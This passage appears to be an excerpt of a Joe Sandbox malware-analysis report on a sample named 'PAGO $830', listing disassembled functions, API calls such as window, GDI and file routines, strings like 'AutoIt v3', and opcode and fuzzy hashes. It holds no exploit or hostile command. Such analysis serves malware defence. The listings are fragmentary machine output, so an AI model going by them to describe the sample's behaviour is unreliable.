                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8511cb7d894ea1ebfa6b9458b8fc0216307370e309d067fb1a9b4c34a5b9f20c
                                                          • Instruction ID: 27e5c98b6d4bd7a4d3de7fe41f1ac38b51211032cd4b77e25732be3529f95020
                                                          • Opcode Fuzzy Hash: 8511cb7d894ea1ebfa6b9458b8fc0216307370e309d067fb1a9b4c34a5b9f20c
                                                          • Instruction Fuzzy Hash: 8D32C031A0425A8BDF289A2CC894F7DBBA3AB42314F6C813ED596975D1D334ED81CB71
                                                          Function 00D792A0 Relevance: .6, Instructions: 564COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c748cad16ed12a08bccba91346241f3a53be818fe76bba1a94036a09dc59597
                                                          • Instruction ID: f0c406acbd5a204a25d01d897ded657f31333c4e1f1cad99f406baa9d2ea206d
                                                          • Opcode Fuzzy Hash: 7c748cad16ed12a08bccba91346241f3a53be818fe76bba1a94036a09dc59597
                                                          • Instruction Fuzzy Hash: B322ABB1A00609DFDF04DFA9D891AEEB7B1FF48300F148529E85AA7291E735E915CB70
                                                          Function 00D7AB30 Relevance: .5, Instructions: 475COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ec95398e49dc0de059947a7a0ed9010817ea4046769a0aaad9cda50068ae439
                                                          • Instruction ID: 10b883147e5f26ed408edcba49093db6c4bd7e1301214cc685440577c1020236
                                                          • Opcode Fuzzy Hash: 5ec95398e49dc0de059947a7a0ed9010817ea4046769a0aaad9cda50068ae439
                                                          • Instruction Fuzzy Hash: 9102B7B1E00205EFCB05DF65D941AADBBB1FF44300F148169E95A9B291FB31EE64CBA1
                                                          Function 00D91940 Relevance: .2, Instructions: 240COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                          • Instruction ID: e615ee56321c25e73ee69dbe1e149186ac6f4b5e9dcfb8d2d8522956571de7ec
                                                          • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                          • Instruction Fuzzy Hash: 75916B7A2090A34AEF2D467E857403EFFE15A523A131E079ED4F2CA1C1FE24C9659A30
                                                          Function 00D979DA Relevance: .2, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1dc8d9117bddb97ec7e90e0fbe0cdc06dc0578a042493e1ecb38d62427674a5
                                                          • Instruction ID: 499dff6ea4c13501459f5f368dea942e33e7f3fb9cea7fa6cf6d0bfa22905cab
                                                          • Opcode Fuzzy Hash: e1dc8d9117bddb97ec7e90e0fbe0cdc06dc0578a042493e1ecb38d62427674a5
                                                          • Instruction Fuzzy Hash: 3A618A7172830967DF389A688C92BBE2384DF42704F1C091AE88ADB2C1D611DF428375
                                                          Function 00D91696 Relevance: .2, Instructions: 232COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                          • Instruction ID: d958fabf6695cb88a48dab7b69220d4253ed3f47000c9724ec51da5663a558fa
                                                          • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                          • Instruction Fuzzy Hash: 6D81747A6090A34ADF2A427E857443EFFE15A523A131E079ED4F2CB1C1EE24D565E630
                                                          Function 013C2068 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                          • Instruction ID: 50a1ed0797b9c98393ff76b050bdfa539ea1e7a08e3ce5ad4bffe692f480ec57
                                                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                          • Instruction Fuzzy Hash: 0F41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                          Function 013C1EF8 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                          • Instruction ID: 9a9be0aa3aced60a474d29a98ae06e1e6a840a98a43689a81d3e45604c275a37
                                                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                          • Instruction Fuzzy Hash: 4201A478A01109EFCB44DF98C5909AEF7F5FF58714F208699E819A7706D730AE41DB80
                                                          Function 013C1F58 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                          • Instruction ID: e64da5b9e1ec285bbd12b9432117ce2fc3e2add9d8a839b628809943c9a951cc
                                                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                          • Instruction Fuzzy Hash: D101AF78A00209EFCB44DF98C5909AEF7F5FF48714F208699E809A7706D730AE51EB80
                                                          Function 013C08C8 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                          Function 00DF2A05 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 00DF2A57
                                                          • DeleteObject.GDI32(00000000), ref: 00DF2A6A
                                                          • DestroyWindow.USER32 ref: 00DF2A79
                                                          • GetDesktopWindow.USER32 ref: 00DF2A94
                                                          • GetWindowRect.USER32(00000000), ref: 00DF2A9B
                                                          • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DF2BCA
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DF2BD8
                                                          • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2C1F
                                                          • GetClientRect.USER32(00000000,?), ref: 00DF2C2B
                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DF2C67
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2C89
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2C9C
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CA7
                                                          • GlobalLock.KERNEL32(00000000), ref: 00DF2CB0
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CBF
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00DF2CC8
                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CCF
                                                          • GlobalFree.KERNEL32(00000000), ref: 00DF2CDA
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CEC
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E0FC54,00000000), ref: 00DF2D02
                                                          • GlobalFree.KERNEL32(00000000), ref: 00DF2D12
                                                          • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DF2D38
                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DF2D57
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D79
                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2F66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                          • API String ID: 2211948467-2373415609
                                                          • Opcode ID: 610b6873b9cbbb3100b46066d8c2500b7419a2ff432140dafa3b62a09057460b
                                                          • Instruction ID: 8b3484cb68737ac275d0d58642167da79091272ee63ccfbd11158f368d16bfa2
                                                          • Opcode Fuzzy Hash: 610b6873b9cbbb3100b46066d8c2500b7419a2ff432140dafa3b62a09057460b
                                                          • Instruction Fuzzy Hash: BD028A71900208AFDB14DF65CC89EBE7BB9EF48710F148258FA15AB2A1DB71AD45CB70
                                                          Function 00E06FA4 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 00E06FFE
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E0702F
                                                          • GetSysColor.USER32(0000000F), ref: 00E0703B
                                                          • SetBkColor.GDI32(?,000000FF), ref: 00E07055
                                                          • SelectObject.GDI32(?,?), ref: 00E07064
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E0708F
                                                          • GetSysColor.USER32(00000010), ref: 00E07097
                                                          • CreateSolidBrush.GDI32(00000000), ref: 00E0709E
                                                          • FrameRect.USER32(?,?,00000000), ref: 00E070AD
                                                          • DeleteObject.GDI32(00000000), ref: 00E070B4
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00E070FF
                                                          • FillRect.USER32(?,?,?), ref: 00E07131
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E07153
                                                            • Part of subcall function 00E072B7: GetSysColor.USER32(00000012), ref: 00E072F0
                                                            • Part of subcall function 00E072B7: SetTextColor.GDI32(?,?), ref: 00E072F4
                                                            • Part of subcall function 00E072B7: GetSysColorBrush.USER32(0000000F), ref: 00E0730A
                                                            • Part of subcall function 00E072B7: GetSysColor.USER32(0000000F), ref: 00E07315
                                                            • Part of subcall function 00E072B7: GetSysColor.USER32(00000011), ref: 00E07332
                                                            • Part of subcall function 00E072B7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E07340
                                                            • Part of subcall function 00E072B7: SelectObject.GDI32(?,00000000), ref: 00E07351
                                                            • Part of subcall function 00E072B7: SetBkColor.GDI32(?,00000000), ref: 00E0735A
                                                            • Part of subcall function 00E072B7: SelectObject.GDI32(?,?), ref: 00E07367
                                                            • Part of subcall function 00E072B7: InflateRect.USER32(?,000000FF,000000FF), ref: 00E07386
                                                            • Part of subcall function 00E072B7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E0739D
                                                            • Part of subcall function 00E072B7: GetWindowLongW.USER32(00000000,000000F0), ref: 00E073AA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                          • String ID:
                                                          • API String ID: 4124339563-0
                                                          • Opcode ID: 249e8cc10c6e57510410f4305a604fe68b2fc0599a3f418f3b58f4025580cf9c
                                                          • Instruction ID: cf9e222c15bc4c05a3572b5e9972d356035d80df97546347d5dd204ed48a683c
                                                          • Opcode Fuzzy Hash: 249e8cc10c6e57510410f4305a604fe68b2fc0599a3f418f3b58f4025580cf9c
                                                          • Instruction Fuzzy Hash: BCA1B272409301AFD7109F61DC48E6B7BA9FF49320F201B19F9A2B61E1D772E988CB51
                                                          Function 00D8A2FA Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(?,?), ref: 00D8A389
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DC7518
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DC7551
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DC7996
                                                            • Part of subcall function 00D8A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D8A15D,?,00000000,?,?,?,?,00D8A12F,00000000,?), ref: 00D8A53A
                                                          • SendMessageW.USER32(?,00001053), ref: 00DC79D2
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DC79E9
                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DC79FF
                                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00DC7A0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 2760611726-4108050209
                                                          • Opcode ID: d5ed6967791f169989e30712b65ab4ca7c29b10461709cfee2c85f33005ef921
                                                          • Instruction ID: a1f677edcf77a4e8f0ebefee9bcdddb0c4f2ed0c4ef6f8fc9307cb5405101982
                                                          • Opcode Fuzzy Hash: d5ed6967791f169989e30712b65ab4ca7c29b10461709cfee2c85f33005ef921
                                                          • Instruction Fuzzy Hash: DF129E34508602AFDB25DF69C884FA9BBE5FF45300F28456DF5859B261C731E886CFA2
                                                          Function 00DF2638 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 00DF2665
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DF2791
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DF27D0
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DF27E0
                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DF2827
                                                          • GetClientRect.USER32(00000000,?), ref: 00DF2833
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DF287C
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DF288B
                                                          • GetStockObject.GDI32(00000011), ref: 00DF289B
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00DF289F
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DF28AF
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DF28B8
                                                          • DeleteDC.GDI32(00000000), ref: 00DF28C1
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DF28ED
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DF2904
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00DF2944
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DF2958
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DF2969
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00DF299E
                                                          • GetStockObject.GDI32(00000011), ref: 00DF29A9
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DF29B4
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00DF29BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: 441b6c995e29b74a4eb3cbec99356a50de3a777ff4a51de1b30e161a6f8516f2
                                                          • Instruction ID: 752b21632db9ecf359326887899a7279d9dfb6914f1af8b40682b95bd1dfd5b6
                                                          • Opcode Fuzzy Hash: 441b6c995e29b74a4eb3cbec99356a50de3a777ff4a51de1b30e161a6f8516f2
                                                          • Instruction Fuzzy Hash: 2EB18D75A40209AFEB14DFA9DC49FAE7BB9EB08710F118254FA14E72D0D770AD45CBA0
                                                          Function 00DE49FD Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00DE4A0B
                                                          • GetDriveTypeW.KERNEL32(?,00E0D034,?,\\.\,00E0D0D0), ref: 00DE4AE8
                                                          • SetErrorMode.KERNEL32(00000000,00E0D034,?,\\.\,00E0D0D0), ref: 00DE4C54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: e9361308b26b9ae128e7f47d74022ed774ef19cda50f75dd505e07a3aefcd411
                                                          • Instruction ID: 524384eed1ea6de11f8003de32da297c53e92938aeec5a78455a6bca5c8b27dd
                                                          • Opcode Fuzzy Hash: e9361308b26b9ae128e7f47d74022ed774ef19cda50f75dd505e07a3aefcd411
                                                          • Instruction Fuzzy Hash: 7761D030705289AFCB04FF26CA46A6ABBB1EB48304F74A015E446BB295D7B1DD81CB71
                                                          Function 00E072B7 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 00E072F0
                                                          • SetTextColor.GDI32(?,?), ref: 00E072F4
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00E0730A
                                                          • GetSysColor.USER32(0000000F), ref: 00E07315
                                                          • CreateSolidBrush.GDI32(?), ref: 00E0731A
                                                          • GetSysColor.USER32(00000011), ref: 00E07332
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E07340
                                                          • SelectObject.GDI32(?,00000000), ref: 00E07351
                                                          • SetBkColor.GDI32(?,00000000), ref: 00E0735A
                                                          • SelectObject.GDI32(?,?), ref: 00E07367
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E07386
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E0739D
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E073AA
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E073F9
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E07423
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00E07441
                                                          • DrawFocusRect.USER32(?,?), ref: 00E0744C
                                                          • GetSysColor.USER32(00000011), ref: 00E0745D
